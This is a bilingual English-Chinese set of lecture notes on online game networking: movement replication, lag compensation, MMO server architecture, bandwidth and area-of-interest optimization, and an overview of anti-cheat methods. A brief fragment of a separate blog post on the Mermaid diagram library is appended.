      我们被拉回到原来的位置,然后僵住了

    webp

    Packet Loss

    数据包丢失

    • Client input packages fail to reach the server

      客户端输入包无法到达服务器

    • The server tries to keep tiny input buffer of unprocessed input

      服务器试图保留未处理输入的微小输入缓冲区

    • lf the server run out of input buffer, server will duplicate your last input in a window

      如果服务器的输入缓冲区用完,服务器将同步您在窗口中的最后一个输入

    • Push client sends missed inputs asap

      推送客户端尽快发送丢失的输入

    webp

    State Synchronization Vs. Lockstep Synchronization

    State Synchronization
    状态同步
    Lockstep Synchronization
    锁步同步
    Deterministic logic
    确定性逻辑
    Not necessary
    不需要
    Necessary
    必要的
    Response
    响应
    Better responsiveness
    更好的响应能力
    Poor responsiveness
    响应性差
    Network Traffic
    网络流量
    Usually high
    通常高
    Usually low
    通常低
    Development efficiency
    开发效率
    Much more complicated
    要复杂得多
    Easy to develop, difficult to Debug
    易于开发,难以调试
    Number of players
    玩家数量
    Few players
    玩家很少
    Support small and large numbers of players
    支持小型和大型玩家
    Cross-platform
    跨平台
    Relatively easy
    相对容易
    Relatively difficult
    相对困难
    Reconnect
    重连
    Relatively easy
    相对容易
    Relatively difficult
    相对困难
    Replay File size
    重播文件大小
    Big
    Small
    Cheat
    欺骗
    Relatively hard
    相对困难
    Relatively easy
    相对容易

    References

    Network Protocols

    Network Synchronization

    第十九节:网络游戏的进阶架构

    Online Gaming Architecture - Advanced Topics

    Character Movement Replication

    角色动作同步

    Character Movement Replication

    角色动作同步

    From player 2’s point of view, player1’s movement is very choppyand lags behind player1’s actual position.

    从玩家 2 的角度来看,玩家 1 的动作非常不稳定,落后于玩家 1 的实际位置。

    Interpolation & Extrapolation

    内插值和外插值

    Purpose: Smooth movementof player’s characters on screen

    目的:玩家角色在屏幕上流畅移动

    Interpolation

    内插值

    • Calculate the state between old butknown states

      计算旧但已知状态之间的状态

    webp

    Extrapolation

    外插值

    • Predict where entity is going from old states

      预测实体从旧状态走向何方

    webp

    Smooth States by Interpolations

    插值平滑状态

    • Position and Orientationcan be interpolated between two recently received data

      位置和方向可以在最近接收到的两个数据之间进行插值

    Buffer States and Deferred Render

    缓冲区状态和延迟渲染

    • Data packet will not be rendered immediately when received

      数据包在收到后不会立即呈现

    • Put into memory and wait for a new data packet

      放入内存并等待新的数据包

    • After waiting for a time offset, start to render first received data packet

      等待时间偏移后,开始渲染第一个接收到的数据包

    • Create an artificial delay of interpolation offset

      创建插值偏移的人工延迟

    webp

    Character Movement Replication by Interpolation

    通过插值同步角色动作

    Result after interpolation was implemented

    插值后的结果

    Interpolation Challenges of Vehicle Movement Replication

    车辆运动同步的插值挑战

    webp

    Estimate Current State by Extrapolation

    通过外推法估计当前状态

    • Use paststates to estimate currentstate to compensate net lag

      使用过去状态来估计当前状态,以补偿净滞后

    Dead Reckoning

    死亡清算

    • Estimate future state based on states that have been received

      根据已收到的状态估计未来状态

    webp

    Projective Velocity Blending

    投影速度混合

    • At $t_0$, the replicated character is at $p_0$ with velocity $v_0$ and acceleration $a_0$, and receive the
      synced states with position $p’_0$, velocity $v’_0$, acceleration $a’_0$

      在时间 $t_0$,同步的角色位于 $p_0$,其速度为 $v_0$,加速度为 $a_0$,并接收到同步的状态,其位置为 $p’_0$,速度为 $v’_0$,加速度为 $a’_0$。

    • We can predict position $p’_t$ after a time duration $t$ based the synced states

      我们可以根据同步的状态预测在时间持续 $t$ 后的位置 $p’_t$。

    $$p’_t=p’_0+v’_0t+\frac{1}{2}a’_0t^2$$

    • Our goal is to reach $p’t|{t=t_B}$ smoothly after $a$ fixed blending time duration: $t_B-t_0$

      我们的目标是在固定的混合时间持续 $t_B - t_0$ 后平滑地到达 $p’t |{t=t_B}$。

    webp

    At any time $t$, we can get the blending velocity $v_t$

    在任何时刻 $t$,我们可以得到混合速度 $v_t$

    $$\lambda=\frac{t-t_0}{t_B-t_0}$$

    $$v_t=v_0+\lambda(v’_0-v_0)$$

    And projecting the position $p_t$ from $p_0$

    并从 $p_0$ 投影位置 $p_t$

    $$p_t=p_0+v_tt+\frac{1}{2}a’_0t^2$$

    Then get the dead reckoned position $p_d$ by combining $p_t$ and $p’_t$

    然后通过结合 $p_t$ 和 $p’_t$ 得到估算位置 $p_d$

    $$p_d=p_t+\lambda(p’_t-p_t)$$

    webp

    Collision Issues

    碰撞问题

    Dead reconking Collision trajection looks weird

    估算碰撞轨迹看起来很奇怪

    Phase 1: Collision starts

    **第一阶段:**碰撞开始

    Phase 2: The replica keeps going, since the extrapolation is basedon the last snaphsot

    **第二阶段:**同步继续进行,因为外推是基于最后一次快照

    Phase 3: Finally we receive a snapshot to stop the replica, but replica gives master’s rigidbody a huge velocity to pushing master away

    **第三阶段:**最后我们收到一个快照来停止同步,但同步会给主体的刚体以巨大的速度将主体推开

    Physics Simualtion Blending During Collision

    碰撞过程中的物理模拟混合

    Tunable between two states

    可在两个状态之间调整

    • State calculated by the client physics simulation

      客户端物理模拟计算的状态

    • State that tries to reach the dead reckoned positions

      试图到达指定位置

    webp

    Tuned blending factors from Watch Dogs 2, Ubisoft Toronto. Bikes recover faster than cars

    调整了育碧多伦多《看门狗 2》的混合因子。自行车的恢复速度比汽车快。

    Usage Scenario of Interpolation

    插值使用场景

    Scenario for Using Interpolation

    使用插值的场景

    • Characters’ movement are very non-deterministic with high acceleration

      角色在高加速度下的运动非常不确定

    • Gameplay suffers from the “wrap”when extrapolation errors occur

      当出现外推错误时,游戏玩法会受到“包装”的影响

    Typical examples

    典型示例

    • FPS
    • MOBA

    webp

    Usage Scenario of Extrapolation

    外推法使用场景

    Scenario for Using Extrapolation

    使用外推法的场景

    • Player movement uses a realistic physical model

      玩家动作使用逼真的物理模型

    • Gameplay suffers from latency due to network transmission

      游戏因网络传输而延迟

    Typical examples

    典型示例

    • Racing game. Vehicle systems (Tanks, Ships, etc.)

      赛车游戏。载具系统(坦克、船舶等)

    webp

    Blend Scenario of Interpolation and Extrapolation

    插值和外推的混合场景

    Sometimes we need to apply both interpolation and extrapolation for the game to work properly

    有时我们需要同时应用插值和外推法才能使游戏正常工作

    • Apply Extrapolation on vehicles

      对车辆应用外推法

    • Apply Interpolation for characters

      对角色应用插值

    • Do extrapolation if not enough data received

      如果没有收到足够的数据,则进行外推

    webp

    Hit Registration

    点击注册

    How to Make a Headshot in Online Game

    如何在网络游戏中进行头部射击

    Net messages to travel from client to server, and interpolation causes you to see the enemy way lag behind

    网络消息从客户端传输到服务器,插值会导致你看到敌人的方式落后

    webp

    Where is the Enemy?

    敌人在哪里?

    Due to latency, interpolation offsetand time delay, you’ll see other players slightly behind their current server positions. Where should I shot?

    由于延迟、插值偏移和时间延迟,你会看到其他玩家稍微落后于他们当前的服务器位置。我应该在哪里开枪?

    Where Should I Shot?

    我应该在哪里开枪?

    webp

    Hit Registration

    点击注册

    Hit registrationis making a consensusof all players that whether you’ve actually hit your enemy

    命中注册是让所有玩家就你是否真的击中了敌人达成共识。

    webp

    • Detecting hit event on client-side with replicated character positions

      通过同步角色位置在客户端检测命中事件

    • Send hit events to the server

      将命中事件发送到服务器

    • Server run simple verification

      服务器运行简单验证

    webp

    A Comparison of HitscanWeapons versus Projectile Weapons

    Hitscan 武器与投射武器的比较

    Unlike hitscanweapons, projectile weapons can also simulate the effect of gravity

    与 hitscanweapons 不同,投射式武器还可以模拟重力的影响

    webp

    《战地》中的风景是由几个 hitbox 构建的,因此破坏可以带走墙壁、地板等。

    webp

    • Hitscan 发射射弹后立即击中目标
    • Projectile 发射射弹后需要一定时间才可击中目标

    A Very Simple Server Verification of Hit Event

    一种非常简单的服务器命中事件验证

    • Client send hit event with complete ray information to server

      客户端向服务器发送包含完整射线信息的命中事件

      • StartPoint, HitPointand HitObjectof the Raycast

        光线投射的起点、终点和终点

    • Validate StartPointwhether is really close enough to shooter

      验证起点是否真的足够接近射击者

    • Validate the HitPointwhether is really belong to HitObject

      验证 HitPoint 是否真的属于 HitObject

    • Ensure nothing is blocking along the path by casting a ray from the StartPointand HitPoint

      通过从起点和终点投射光线,确保路径上没有任何遮挡

    In real game, the server verification is VERY TRICKY AND COMPLICATED

    在真实游戏中,服务器验证非常棘手和复杂

    Server Verification Has to Guess

    服务器验证必须猜测

    webp

    Problem of Client-Side Hit Detection

    客户端命中检测问题

    Efficient and Precise

    高效精准

    • Very efficient for hit detection without huge server workload

      非常有效的命中检测,无需巨大的服务器工作负载

    • Best shooting experience with pixel precision

      像素精度最佳的拍摄体验

    Unsafe for cheating

    易于玩家作弊

    • Fake hit event message

      假热门事件消息

    • Lag switches

      滞后开关

    • Infinite ammo

      无限弹药

    Detecting Hit on Server-Side?

    检测服务器端的命中?

    Client doesn’t know the target current location on server

    客户端不知道服务器上的目标当前位置

    webp

    Lag Compensation

    滞后补偿

    Server-side state rewinding to compensate network lags when player’s commands are executed

    服务器端状态倒带,以补偿执行玩家命令时的网络延迟

    • Get information from clients

      从客户那里获取信息

    • Rewind game state in cached state snapshots that matches the client’s action time

      在与客户端操作时间匹配的缓存状态快照中回放游戏状态

    • Run client operation in rewind game state

      在倒带游戏状态下运行客户端操作

    webp

    Compensate all Possible Lags

    补偿所有可能的延迟

    • RewindTime = Current Server Time - Packet Latency - Client View Interpolation Offset

      RewindTime = 当前服务器时间 - 数据包延迟 - 客户端视图插值偏移

    webp

    webp

    Actor: Enemy’s client state

    角色:敌人的客户端状态

    Red collision box: Enemy in the player’s view

    红色碰撞框:玩家视野中的敌人

    Blue collision box: Rewinded server state

    蓝色冲突框:倒带服务器状态

    Cover Problems –Running into Cover

    掩体问题——遇到掩体

    webp

    被击中者躲到掩体后因为网络延迟仍被击中,Shooter’ s advantage.

    Cover Problems –Coming out from Cover

    webp

    被攻击者从掩体出来因网络延迟未被击中,Peeker’s advantage.

    Startup Frames to Ease Latency Feeling

    启动框架缓解延迟感

    • A fixed animation before attack or move can also eliminate the effect of lag from network transmission

      攻击或移动前的固定动画(技能前摇)也可以消除网络传输延迟的影响

    • Players will keep their attention on animations and ignore the state delay

      玩家将注意力集中在动画上,忽略状态延迟

    webp

    Local Forecast VFX Impacts

    本地预测 VFX 影响

    • Clients can perform local hit tests in order to give the player some instant feedback, such as displaying a blood splatter visual effect

      客户端可以执行本地命中测试,以便为玩家提供一些即时反馈,例如显示血溅的视觉效果

    • However, any permanent effects of the hits, such as reducing the hit points of a player, are only applied after receiving confirmation from the server

      但是,只有在收到服务器的确认后,才会应用命中的任何永久效果,例如减少玩家的命中点

    MMOG Network Architecture

    MMOG 网络架构

    What is MMOG?

    什么是 MMOG?

    MMOG: Massively Multiplayer Online Game, or more commonly MMO

    MMOG:大型多人在线游戏,或更常见的 MMO

    MMOs with a large numbers of players, often hundreds or thousands, on the same server can enable players to cooperate and compete with each other on a large scale, and include a variety of gameplay types (MMORPG, MMORTS, MMOFPS, etc.)

    在同一台服务器上拥有大量玩家(通常是数百或数千人)的 MMO 可以使玩家能够大规模地相互合作和竞争,并包括各种游戏类型(MMORPG、MMORTS、MMOFPS 等)

    webp

    webp

    Diversities of Modern MMO

    现代 MMO 的多样性

    webp

    Game Sub-Systems

    游戏子系统

    MMOs have a variety of gameplay and are supported by many sub-systems

    MMO 具有多种游戏玩法,并得到许多子系统的支持

    • User management

      用户管理

    • Matchmaking

      配对

    • Trading system

      交易系统

    • Social system

      社会制度

    • Data storage

      数据存储

    MMO Architecture

    MMO 架构

    webp

    链路层服务

    Login Server

    登录服务器

    • Verification of client connection

      客户端连接验证

    Gateway

    网关

    • Very important layer to separate inside/outside networks

      分隔内部/外部网络的非常重要的层

    webp

    Lobby

    大厅

    • Players can gather in the lobby, see and interact with other players

      玩家可以聚集在大厅,观看并与其他玩家互动

    • When the number of players continues to increase, it is a challenge to the performance of the server and the client

      当玩家数量持续增加时,服务器和客户端的性能都会受到挑战

    webp

    Character Server

    角色服务器

    All player data is managed in one system. Such as account info, character info, backpack info, mail info, etc.

    所有玩家数据都在一个系统中管理。如账户信息、人物信息、背包信息、邮件信息等。

    webp

    Trading System

    交易系统

    • Buying and selling items on the marketplace

      在市场上买卖商品

    • Sending items or coins to other players through the in-game Mail

      通过游戏内邮件向其他玩家发送物品或硬币

    • Game designers need to keep an eye on market prices to prevent imbalances

      游戏设计师需要关注市场价格,以防止不平衡

    • For a persistent world to maintain a stable economy, a balance must be struck between currency sources and sinks

      为了使世界保持稳定的经济,必须在货币来源和汇之间取得平衡

    • Players can use real-world money to buy a specific in-game item

      玩家可以用现实世界的钱购买特定的游戏内物品

    webp

    Social System

    社会制度

    • Player-to-player interplay and communication

      玩家之间的互动和沟通

    • Foster stronger social cohesion in-game

      在游戏中培养更强的社会凝聚力

    webp

    Matchmaking

    配对

    • You have to consider attributes like skills, level, latency, wait time…

      你必须考虑技能、级别、延迟、等待时间等属性…

    • Ingeneral, makingagood matchmaking service is core for a game design

      一般来说,提供良好的配对服务是游戏设计的核心

    • Running this on a global scale for your player population presents a whole different set of challenges

      在全球范围内为您的玩家群体运行此功能会带来一系列完全不同的挑战

    webp

    Data Storage

    数据存储

    The game data is very complex and diverse

    游戏数据非常复杂和多样化

    • Player data (guilds, dungeons, warehouse, etc.)

      玩家数据(公会、地下城、仓库等)

    • Monitoring data

      监测数据

    • Mining data

      最小化数据

    Data needs to be securely persisted and efficiently organized for retrieved and analysis etc.

    数据需要安全地持久化,并有效地组织起来进行检索和分析等。

    webp

    Relational Data Storage

    关系数据存储:MySQL

    • Requires Structure to be Predetermined

      需要预先确定结构

    • Flexible Queries

      灵活的查询

    • Always Consistent

      始终保持一致

    Game Development Examples

    游戏开发示例

    • Player Data

      玩家数据

    • GameData

      游戏数据

    • Inventory

      库存

    • ItemShops/Trading

      商品商店/贸易

    Non-Relational Data Storage

    非关系数据存储:MongoDB

    • Structure Can Change For Each Entry

      每个条目的结构都可能发生变化

    • Queries Have Higher Specificity

      查询具有更高的特异性

    • May Not Always Be Consistent

      可能并不总是一致的

    Game Development Examples

    游戏开发示例

    • Player/Item Stats/Profile Game Data

      玩家/物品统计/个人资料游戏数据

    • Enchantments and Upgrades

      魔法和升级

    • Game States

      游戏状态

    • Quest Data

      任务数据

    In-Memory Data Storage

    内存数据存储:redis

    • Extremely Fast (Memory versus Hard Disk)

      极快(内存与硬盘)

    • Key-Value

      关键价值

    • Fast Sorted/Ranged Searches

      快速排序/范围搜索

    • Persistence among servers

      服务器间的持久性

    Game Development Examples

    游戏开发示例

    • Matchmaking

      配对

    • Leaderboards

      排行榜

    • Session Management

      会话管理

    • Boost Performance For Other Databases

      提高其他数据库的性能

    Player Number Growth

    玩家数量增长带来的服务器负担

    webp

    Distributed System

    分布式系统

    A distributed system is a computing environment in which various components are spread across multiple computers (or other computing devices) on a network

    分布式系统是一种计算环境,其中各种组件分布在网络上的多台计算机(或其他计算设备)上

    webp

    Challenges with Distributed systems

    分布式系统的挑战

    • Data access mutual exclusion

      数据访问互斥

    • Idempotence

      意识

    • Failure and partial failure

      故障和部分故障

    • Unreliable network

      不可靠的网络

    • Distributed bugs spread epidemically

      分布式漏洞以流行病的方式传播

    • Consistency and consensus

      一致性和共识

    • Distributed transaction

      分布式事务

    Load Balancing

    负载平衡

    Refers to the process of distributing a set of tasks over a set of resources (computing units), with the aim of making their overall processing more efficient

    指将一组任务分配到一组资源(计算单元)上的过程,目的是提高其整体处理效率

    • Optimize the response time

      优化响应时间

    • Avoid unevenly overloading some compute nodes while other compute nodes are left idle

      避免在其他计算节点处于空闲状态时,不均匀地使某些计算节点过载

    • All players are evenly divided on multiple servers

      所有玩家平均分布在多个服务器上

    webp

    Consistent Hashing

    一致散列

    It was designed to avoid the problem of having to reassign every player when a server is added or removed throughout the cluster

    它旨在避免在整个集群中添加或删除服务器时必须重新分配每个玩家的问题

    webp

    webp

    webp

    Virtual Server Node in Consistent Hashing

    一致散列中的虚拟服务器节点

    webp

    Servers Management

    • The number of services increases

      服务数量增加

    • Difficult to manage

      难以管理

    • Lacks the flexibility to change the IP or port at a later point in time

      缺乏在以后更改 IP 或端口的灵活性

    webp

    Service Discovery - Registry

    服务发现-注册表

    • Registers itself with the service registry when it enters the system

      当服务进入系统时,在服务注册表中注册

    • An example of Register value

      寄存器值示例

      • server type/server_name@server_ip:port

    webp

    Service Discovery - Query and Watch

    服务发现-查询和监视

    • Request service discovery service to query all values through service type and watch it

      请求服务发现服务通过服务类型查询所有值并查看

    webp

    Service Discovery - Health Check

    服务发现-健康检查

    • Notice Gateway Server B Failure when Server Instance B Heartbeat timeout

      服务器实例 B 心跳超时时通知网关服务器 B 故障

    webp

    Bandwidth Optimization

    优化带宽

    Why Bandwidth Matters

    为什么带宽很重要

    • Usage-based billing: e.g. mobile, cloud service

      基于使用量的计费:例如移动、云服务

    • Latency increased by bandwidth: packet splitting/drop

      延迟随带宽增加:数据包拆分/丢弃

    • Connection drops due to message overflow

      消息溢出导致连接中断

    Calculate Bandwidth

    计算带宽

    Affecting factors

    影响因素

    • n = player numbers 玩家数量
    • f = update frequency 更新频率
    • s = size of game state 游戏状态大小

    webp

    Data transfer per second

    每秒数据传输

    • Server 服务器:$O(n\cdot s\cdot f)$

    • Client (downstream) 客户端(下游):$O(s\cdot f)$

    • Client (upstream) 客户端(上游):$O(f)$

    webp

    Data Compression

    数据压缩

    • There are a lot of floating point numbers in the game synchronization data, such as position, rotation, speed, etc.

      游戏同步数据中有很多浮点数,如位置、旋转、速度等。

    • Choosing the right floating-point precision can save a lot of bandwidth

      选择正确的浮点精度可以节省大量带宽。

      • e.g When representing human running speed, only half precision is required

        例如,在表示人类跑步速度时,只需要一半的精度

    webp

    • When representing player position, the player will only move within a certain range due to player speed limitations

      代表玩家位置时,由于玩家速度限制,玩家只能在一定范围内移动

    • We can divide the map into different small pieces and use the relative position to represent the player’s position, which can reduce the precision of the floating point number of the synchronization position

      我们可以将地图分成不同的小块,并使用相对位置来表示玩家的位置,这会降低同步位置浮点数的精度

    webp

    Object Relevance

    对象相关性

    • The player will be informed of state updates

      玩家将收到状态更新的通知

    • Usually, the ones player can see & interact

      通常,玩家可以看到并互动

    • Easiest implementation: all objects relevant to all clients (for small player num).

      最简单的实现:与所有客户端相关的所有对象(对于小玩家 num)。$O(n^2)$

    • Limiting factor for max concurrent players

      最大并发玩家的限制因素

    webp

    Relevance - Static Zones

    相关性-静态区域

    • Distribute players into different zones

      将玩家分配到不同的区域

    • Players are relevant in the same zone

      玩家在同一区域内具有相关性

    • Reduce bandwidth waste

      减少带宽浪费

    webp

    Relevance - Area of Interest (AOI)

    相关性-关注领域(AOI)

    • The area within which objects are relevant to Player/NPC

      对象与玩家 / NPC 相关的区域

    • Only see & interact with objects within range

      仅查看范围内的对象并与之交互

    • Remove unnecessary network data

      删除不必要的网络数据

    webp

    AOI -Direct Range-Query

    AOI - 直接范围查询

    • $\sqrt{(x_{player}-x_i)2-(y_{player}-y_i)2}\le r_{doi}$

    • Simple to implement 易于实施

    • Time complexity 时间复杂度: $O(n^2)$

    • Not suitable for MMOG, e.g. 1000 players in one zone, 20 ticks/s

      不适合 MMOG,例如一个区域有 1000 名玩家,20 滴答/秒

      1000 x 1000 x 20 = 20,000,000 distance computations per second

      1000 x 1000 x 20 = 每秒 20000000 次距离计算

    webp

    AOI - Spatial-Grid

    AOI - 空间网格

    Mapping Entities

    映射实体

    • Map entity $(x, y)$ → grid $N$

      映射实体$(x, y)$ → 网格 $N$

    • Relevant entities in the grids around current player’s grid

      当前玩家网格周围网格中的相关实体

    • Player’s AOI list can be cached

      玩家的 AOI 列表可以缓存

    webp

    Events

    事件

    Enter

    进入

    • Add entities from observation (observed) list

      从观察(observation)列表中添加实体

    Leave

    离开

    • Remove entities from observation (observed) list

      从观察(已观察)列表中删除实体

    webp

    Pros and Cons

    优点和缺点

    Pros

    • Fast query time $O(1)$

      快速查询时间 $O(1)$

    Cons

    • Small grid: high memory cost

      小网格:内存成本高

    • Large grid: high CPU cost

      大网格:CPU 成本高

    • Object with varying AOI radius?

      具有不同 AOI 半径的物体?

    webp

    AOI - Orthogonal Linked-list

    AOI - 正交链表

    • Game entities in double linked-list

      双链表中的游戏实体

      • xlist, ylist

      • ascending order

        升序

    • Less Objects to traverse

      需要遍历的对象更少

    webp

    Traverse entities

    遍历实体

    • Within aoi radius

      aoi 半径内

    • Left/right direction

      左 / 右方向

    • For both x/y lists

      对于 x/y 两个列表

    webp

    Better Approach - Range Trigger

    更好的方法-范围触发

    • Entity move → trigger move

      实体移动 → 触发移动

    • Compare with trigger

      与触发器比较

    • Event driven

      事件驱动

    webp

    Pros

    • Memory efficient

      内存效率高

    • Varying AOI radius

      可变 AOI 半径

    Cons

    • New object insertion cost $O(n)$

      新对象插入成本 $O(n)$

    • Not Suitable when entities move large distance frequently

      当实体频繁移动远距离时不适用

    webp

    AOI - Potentially Visible Set (PVS)

    AOI - 潜在可见集(PVS)

    • Set of potentially visible areas

      一组潜在可见区域

    • Can be calculated offline

      可以离线计算

    • Determine relevant objects from PVS

      从 PVS 中确定相关对象

    • e.g. Racing game: fast-moving car

      例如赛车游戏:快速行驶的汽车

    webp

    Varying Update Frequency by Player Position

    根据玩家位置改变更新频率

    • Distance-based update frequency

      基于距离的更新频率

    • Only closer objects are interactable

      只有较近的对象是可交互的

    • Distance ↑ → f → bandwidth ↓

      距离 ↑ → f → 带宽 ↓

    webp

    Cheating Kill Online Games

    作弊杀死在线游戏

    How likely, if at all, would you be to stop playing a multiplayer game online if you thought other players were cheating to gain an unfair advantage?

    如果你认为其他玩家作弊以获得不公平的优势,你有多大可能停止玩在线多人游戏?

    Very likelyFairly likelyNot very likelyNor linkly at allDon’t konw
    Global29%48%15%4%5%
    China25%56%16%2%1%
    Germany30%36%17%8%8%
    Japan26%49%16%2%7%
    South Korea27%59%11%1%1%
    UK33%39%12%6%10%
    US37%32%15%7%8%

    77% of players will likely stop playing online games when other players are cheating, according to the survey of Irdeto.

    爱迪德的调查显示,当其他玩家作弊时,77% 的玩家可能会停止玩网络游戏。

    Millions Ways of Cheating

    数百万种作弊方式

    Game code modifications

    游戏代码修改

    • Modify or read memory data

      修改或读取内存数据

    • Crack client

      破解客户端

    System software invoke

    系统软件调用

    • D3D Render Hook

      D3D 渲染挂钩

    • Simulate mouse and keyboard operations

      模拟鼠标和键盘操作

    Net Packet interception

    网络数据包拦截

    • Send fake packets

      发送虚假数据包

    • Modify packet data

      修改数据包

    webp

    Obfuscating Memory

    混淆记忆

    • A cheater might be able to get the location of the player coordinates in the memory and move the character ignoring the game rules, such as passing the wall

      作弊者可能能够获得玩家在内存中的坐标位置,并忽略游戏规则移动角色,例如通过墙壁

    • Furthermore, the cheater can utilize the location of these values to map out even larger data structures in the memory, such as the player object itself

      此外,作弊者可以利用这些值的位置在内存中绘制出更大的数据结构,例如玩家对象本身

    webp

    Executable Packers

    可执行打包器

    • Game core logic can be restored by reverse engineering

      游戏核心逻辑可以通过逆向工程恢复

    • Players can crack the game by analyzing the code, finding game loopholes, making plug-ins, etc…

      玩家可以通过分析代码、发现游戏漏洞、制作插件等来破解游戏…

    webp

    • The packager obfuscates the source program and adds decompression code

      打包器混淆源程序并添加解压缩代码

    • The decompression code will execute first, and the source program is decrypted in memory

      解压缩代码将首先执行,源程序在内存中解密

    webp

    Verifying Local Files by Hashing

    通过哈希验证本地文件

    • Ensure that the game files have not been modified

      确保游戏文件未被修改

    • For example, the cheater could modify the wall textures to be transparent so all enemies could be seen through the walls

      例如,作弊者可以将墙壁纹理修改为透明,这样所有敌人都可以透过墙壁看到

    • The cheater could also adjust the lightning to make it easier to see enemies

      作弊者还可以调整闪电,使其更容易看到敌人

    webp

    Packet Interception and Manipulation

    数据包拦截和操纵

    • When the data is not encrypted or hacked, the player can build game logic based on packet data even without starting the game

      当数据未被加密或黑客攻击时,即使不启动游戏,玩家也可以基于数据包构建游戏逻辑

    • Such cheat programs often become money-making tools, which seriously reduce game’s the overall profit

      这种作弊程序往往成为赚钱的工具,严重降低了游戏的整体利润

    webp

    Encrypt the Network Traffic

    加密网络流量

    Two kinds of algorithms

    两种算法

    • Symmetric-key algorithm

      对称密钥算法

      • Obfuscate and restore data according to the same key

        根据同一密钥混淆和还原数据

      • Fast and efficient

        快速高效

    webp

    Asymmetric encryption

    非对称加密

    • Encryption and decryption use different keys

      加密和解密使用不同的密钥

    • Slow, only used for encrypting critical data

      速度慢,仅用于加密关键数据

    webp

    • Distribute symmetric key securely using asymmetric encryption

      使用非对称加密安全地分发对称密钥

    • Transfer data using symmetric encryption key

      使用对称加密密钥传输数据

    webp

    System Software Invoke

    系统软件调用

    • Modify the DirectX kernel and change the execution flow of the rendering function

      修改 DirectX 内核并更改渲染函数的执行流程

    • Can force the rendering engine to modify the occlusion relationship

      可以强制渲染引擎修改遮挡关系

    • See the movement of the enemy behind the wall

      看墙后敌人的动向

    webp

    Valve Anti-Cheat and Easy Anti-Cheat

    阀门防作弊和简易防作弊

    • Detects malicious behavior caused by any file conflicts while interacting with the game

      检测与游戏交互时由任何文件冲突引起的恶意行为

    • Stops the player from playing the game at all

      完全阻止玩家玩游戏

    • Prevents any illegal modifications and configuration changes that enable the use of exploits in a game

      防止任何非法修改和配置更改,从而在游戏中使用漏洞

    webp

    AI Cheat

    AI 作弊

    • All platforms

      所有平台

    • No code modification required

      无需修改代码

    • Independent from the game

      独立于游戏

    • Game screen

      游戏画面

    • Target detection

      目标检测

    • Move cursor

      移动光标

    • Fire

      开火

    webp

    Rich AI Middlewares

    丰富的 AI 中间件

    • Real-Time Object Detection. YOLO V5, V7…

      实时目标检测。YOLO V5,V7…

    • Skeleton based Action recognition

      基于骨架的动作识别

    webp

    Counter-Strike: Overwatch

    反恐精英:守望先锋

    • The system is based on other players reviewing footage from players that are suspected of cheating

      该系统基于其他玩家查看涉嫌作弊的玩家的录像

    • Many reviewers are looking at the same cases and the majority decide whether the suspect was cheating or not

      许多审查人员正在审查同样的案件,大多数人决定嫌疑人是否作弊

    webp

    Passing judgement after reviewing evidence in Counter Strike: Global Offensive’s Overwatch system

    在《反恐精英:全球攻势的守望先锋》系统中审查证据后作出判断

    Statistic-based System

    基于统计的系统

    • Collect the user’s game information, such as victory and critical hit rate

      收集用户的游戏信息,如胜利和暴击率

    • Compare your own historical data and some thresholds rules or from other player’s reports to mark players

      比较您自己的历史数据和一些阈值规则或其他玩家的报告,以标记玩家

    • Check manually to confirm whether they cheat

      手动检查以确认他们是否作弊

    webp

    Detecting Known Cheat Program

    检测已知作弊程序

    • A proper anti-cheat program should have a way to scan the user’s computer for known cheating programs based on various signatures

      一个合适的反作弊程序应该有一种方法,可以根据各种签名扫描用户的计算机,寻找已知的作弊程序

    • The simplest method can simply entail comparing hashes or process names

      最简单的方法可能只是比较哈希或进程名称

    webp

    Build a Scalable World

    构建一个可扩展的世界

    Scalable Game Servers

    可扩展游戏服务器

    Zoning

    分区

    • Distribute large player numbers in a large world

      在广阔的世界中分配大量玩家

    • Distribution might be uneven

      分布可能不均匀

    Instancing

    实例化

    • Run a large number of game areas independently in parallel

      并行独立运行大量游戏区域

    • Reduce congestion/competition

      减少拥堵 / 竞争

    Replication

    同步

    • Allows high user density

      允许高用户密度

    • E.g. high density PVP games

      例如高密度 PVP 游戏

    Zoning - Seamless Zones

    分区-无缝分区

    • Players are reasonably distributed in a large world

      玩家在广阔的世界中分布合理

    • The client only connects to one responsible server

      客户端只连接到一个负责的服务器

    • Cross border: auto transfer client to another server

      跨境:自动将客户端转移到另一台服务器

    webp

    Zone Border

    区域边界

    Smooth experience:

    流畅体验:

    • Border width >= max AOI radius

      边框宽度 >= 最大 AOI 半径

    But how to make them interact?

    但是如何让它们互动呢?

    webp

    Zone Border - Entities

    区域边界-实体

    Active Entity

    活跃实体

    • Resides in connected zoned server (authority)

      驻留在已连接的分区服务器(权限)中

    • Has a ghost agent in other zones

      在其他区域有幽灵特工

    • Can see ghost entities in another zone

      可以在另一个区域中看到幽灵实体

    Ghost Entity

    幽灵实体

    • Also called shadow entity

      也称为阴影实体

    • Is an agent entity owned by another zone

      代理实体是否由另一个区域拥有

    • Receive updates from original entity

      接收来自原始实体的更新

    webp

    Cross Border: A -> B

    跨境:A->B

    1. Before move

      移动前

      • An active entity in zone A

        A 区中的活动实体

    2. Near boundary (A)

      近边界(A)

      • Active in A; Ghost in B

        活跃在 A;鬼魂在 B

    3. At boundary

      边界处

      • The entity has been transferred to zone B

        实体已转移到 B 区

    4. Near boundary (B)

      边界附近(B)

      • Active in B; Ghost in A

        活跃于 B;鬼魂在 A

    5. Beyond boundary (B)

      边界之外(B)

      • Removedfrom zone A

        从 A 区移除

    webp

    Replication

    同步

    • Cooperatively process same world zone

      合作处理同一世界区

    • Entity updates are distributed among servers

      实体更新分布在服务器之间

    • Each server creates its own active entities

      每个服务器都创建自己的活动实体

    • Updates to active entities will be auto replicated to all remaining servers (as Ghost)

      对活动实体的更新将自动复制到所有剩余的服务器(作为 Ghost)

    webp

    Scalable Game Servers -Combination

    webp

    References

    Replicate Character Movement

    Lag Mitigation

    MMOG Network Architecture

    Bandwidth Optimization

    Anti-Cheat

    Citation

    ]]>
    @@ -1037,7 +1037,7 @@ /posts/Web-Mermaid/ - 资源

    快速开始

    自动挡

    ​获取文件:https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js

    ​导入文件并使用 mermaid.initialize({startOnLoad:true}); 加载:

    ​使用 <pre class="mermaid"></pre> 内包含语句定义图表:

    <script type="text/javascript" src="/js/mermaid.min.js"></script>
    <script>mermaid.initialize({startOnLoad:true});</script>
    <pre class="mermaid">
    graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
    </pre>
    graph TD;    A-->B;    A-->C;    B-->D;    C-->D;

    ​更多语法见官方文档。这个工具使用了较为简洁的语法实现了画图的功能。(感觉好慢……)

    手动挡

